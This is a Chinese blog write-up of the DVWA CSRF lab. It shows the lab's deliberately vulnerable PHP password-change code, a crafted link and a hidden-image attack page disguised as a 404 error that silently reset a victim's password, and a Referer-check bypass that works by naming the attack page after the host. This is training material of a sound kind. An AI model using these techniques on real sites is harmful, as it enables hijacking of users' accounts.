CSRF(跨站请求伪造)

最新推荐文章于 2024-05-28 14:38:53 发布
最新推荐文章于 2024-05-28 14:38:53 发布
阅读量109 收藏
点赞数
分类专栏: DVWA
本文链接:https://blog.csdn.net/curryzzb/article/details/115601772
版权

CSRF:

跨站请求伪造,利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。

Low:

源代码:

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match? 密码匹配
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

方法一:构造链接

http://127.0.0.1/DVWA/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#

只要受害者点击了这个链接,他的密码就会被修改成password。

可以使用短链接来伪装一下,由于这里使用的是本机的ip地址访问的,实际中的域名访问链接是可以生成相应的短链接。

方法二:构造攻击页面

<img src="http://127.0.0.1/DVWA/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#" border="0" style="display:none;"/>   
<!-- 将图片的地址设置为需要访问的链接,在受害者打开页面时,会直接访问到图片的地址,通过设置样式将图片隐藏-->

<h1>404<h1>

<h2>file not found.<h2>
<!--用户会认为访问到错误页面-->

Medium:

源代码:

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Checks to see where the request came from
    if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
        // Get input
        $pass_new  = $_GET[ 'password_new' ];
        $pass_conf = $_GET[ 'password_conf' ];

        // Do the passwords match?
        if( $pass_new == $pass_conf ) {
            // They do!
            $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
            $pass_new = md5( $pass_new );

            // Update the database
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Feedback for the user
            echo "<pre>Password Changed.</pre>";
        }
        else {
            // Issue with passwords matching
            echo "<pre>Passwords did not match.</pre>";
        }
    }
    else {
        // Didn't come from a trusted source
        echo "<pre>That request didn't look correct.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

增加代码:

    if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false )
  • stripos() 函数查找字符串在另一字符串中第一次出现的位置(不区分大小写),格式stripos(string,find,start)。
  • eregi()函数在指定字符串中搜索字符串,int eregi(string pattern, string string,意思是在string中寻找pattern字符串,不区分大小写。
  • HTTP_REFERER:http包头的Referer参数的值
  • HTTP_NAME:http包头的host参数的值

漏洞的利用:

  • 本题的过滤规则是http包头的Referer参数的值中必须包含主机名

方法一:将攻击页面命名为192.168.153.130.html(页面被放置在攻击者的服务器里)就可以绕过了

方法二:也可以将攻击页面放在一个以host参数的值为名的文件夹下也可以绕过

High:(未完)

源代码:

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();

?>

High级别的代码加入了Anti-CSRF token机制,增加了token的匹配,想要绕过这一机制,关键是需要获得受害者点击链接时对服务器请求中的token

Оrdsh1ne
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss和csrf详解
weixin_33737774的博客
08-29 327
XSSCross site scripting,全称“脚本”特点是不对服务器造成任何伤害,而是通过一些正常的内交互途径,例如发布评论时,提交含有js的内容文本,而服务器没有过滤掉或者转义掉这些脚本,作为内容发布到页面上,那么其他用户在访问的时候就会运行这些脚本。for example:​ // 用 &lt;script type="text/javascript"&gt;&lt;/scrip...
【burpsuite安全练兵场-客户端12】请求伪造CSRF-12个实验(全)
wangluoanquan111的博客
03-19 1833
blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。!blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-
CSRF详解(请求伪造)
最新发布
qq_70584783的博客
05-28 638
工作原理:当用户在不知情的情况下点击了一个恶意链接或者访问了包含攻击代码的页面时,攻击代码就会以用户的身份向服务器发送请求,从而在用户的权限下执行非法操作,如转账、修改密码等。概念解释:CSRF,即请求伪造,是一种攻击者利用用户在网上的身份认证信息,通常是未失效的Cookie或会话,诱使用户发起非预期的请求到目标网的攻击方式。按请求类型分类:CSRF攻击可以按照HTTP请求的类型进行分类,常见的有GET请求和POST请求CSRF攻击。技术进步:随着技术的发展,新的防御技术和攻击手段将不断出现。
请求伪造csrf
weixin_45095113的博客
11-15 990
csrf
CSRF请求伪造 | 总结记录
m0_56691564的博客
11-08 665
定义:攻击者利用服务器对用户的信任,从而欺骗受害者去服务器上执行受害者不知情的请求。在csrf的攻击场景中,攻击者会伪造一个请求,然后欺骗用户进行点击,用户一旦点击攻击也就完成了,当然有时候也不需要用户点击,访问页面的时候攻击以及达成了。
web基础漏洞之CSRF请求伪造漏洞)
m0_62274649的博客
10-04 1273
一些自己的小总结,有待完善
Django CSRF请求伪造防护过程解析
09-18
CSRF请求伪造)是一种常见的网络安全威胁,攻击者利用用户的已登录状态,在用户不知情的情况下,通过恶意网发起对受害者的合法网请求,执行非用户意愿的操作。Django框架提供了一套强大的CSRF防护机制,...
CSRF请求伪造,含使用教程和测试工具
05-04
CSRF请求伪造,使用OWASP CSRFTester工具可以抓取并伪造请求,其测试原理是,使用代理抓取我们在浏览器中访问过的所有的连接以及所有的表单等信息,通过在CSRFTester中修改相应的表单等信息,重新提交,相当于一...
csrf请求伪造简单示例
10-18
一个简单的csrf请求伪造的示例,只有一个简单的表单提交功能.通过伪造表单提交,完成一个简单的钓鱼案例
CSRF请求伪造CSRF PHP demo代码
05-04
CSRF(Cross-Site Request Forgery,请求伪造)是一种网络攻击方式,攻击者通过诱导用户在已登录的网上执行非预期的操作。在这个PHP demo中,我们将深入理解CSRF攻击的原理,并探讨如何防范。 首先,让我们看...
请求伪造-CSRF防护方法
03-12
请求伪造-CSRF防护方法请求伪造-CSRF防护方法
请求伪造解决办法之——过滤referer
weixin_34362991的博客
04-06 3846
 当然,referer也是可以伪造的,Http请求本身就没有不能伪造的东西。 所以本方法只能在一定程度上防止非法请求,仅供参考。   项目的web.xml中增加过滤器: &lt;filter&gt; &lt;filter-name&gt;RefererFilter&lt;/filter-name&gt; &lt;filter-class&gt...
CSRF请求伪造攻击+案例分析
ylf13的专栏
07-27 3092
最近在拜读《web前端黑客技术揭秘》,不是想学
jango的CSRF请求伪造即解决方法
GrassXY的博客
06-01 135
1.前戏 钓鱼网 理论: 做一个与正规网一模一样的界面 用户在上面操作 比如转账 转账请求确实是发送给了正规的网后台只不过收款人变成了 钓鱼网指定的账户 原理: 获取用户输入的表单内 给用户展示了一个没有name属性的框 自己偷偷的写了一个既有name又有value的隐藏框 ...
CSRF解决方案 (请求伪造攻击)
futureXgm的博客
10-12 3555
区别: XSS攻击点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网.攻击者盗用了你的身份,以你的名义发送恶意请求CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,发表评论,甚至于购买商品,虚拟货币转账......造成的问题包括:个人隐私泄露以及财产安全。 攻击方法: CSRF的主要手法是利用请求,在用户不知情的情况下,以用户的身份伪造请求。其核...
请求伪造CSRF)示例、原理及其防御措施
laker的博客
03-04 1982
文章目录概述例子原理防御使用token验证判断Referer/OriginSameSite Cookie属性 概述 CSRF是Cross Site Request Forgery的缩写,中文翻译过来是请求伪造。它欺骗用户在当前已通过身份验证的Web应用程序上执行不需要的操作。在社交软件的帮助下(例如通过电子邮件或聊天发送链接),攻击者可能会欺骗Web应用程序的用户执行攻击者选择的操作。如果受害者是普通用户,则成功的CSRF攻击会迫使用户执行状态更改请求,例如转账,更改其电子邮件地址等。如果受害者是管理帐
CSRF———— (一)伪造请求漏洞示例
weixin_43102772的博客
03-01 199
一、什么是CSRF 1.1简介 csrf(cross-site request forgery)请求伪造。缩写为CSRF或XSRF。CSRF通过利用受信任用户的请求来利用受信任的网,简单来说,就是利用用户请求来利用网。 1.2 CSRF和XSS区别 XSS是利用用户对浏览器的信任 盗取cookie CSRF是利用网对用户浏览器的信任 对网发起请求,达到攻击者述求 1.3 CSRF原...
CSRF 请求伪造
进无止境
07-06 154
CSRF(Cross Site Request Forgery),中文是请求伪造CSRF攻击者在用户已经登录目标网之后,诱使用户访问一个攻击页面,利用目标网对用户的信任,以用户身份在攻击页面对目标网发起伪造用户操作的请求,达到攻击目的。 举个列子 假如A为受信任的银行网,其中有个银行转账的表单;B为黑客网,其中有个页面带有伪造A银行转账表单提交的请求,当用户登录A后,在...
CSRF请求伪造漏洞
12-06
CSRF(Cross-site request forgery)请求伪造是一种网络攻击方式,攻击者通过伪造用户请求来冒充用户身份,从而进行一些非法操作。攻击者通常会在第三方网上设置陷阱,引诱用户点击链接或者访问页面,从而触发...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值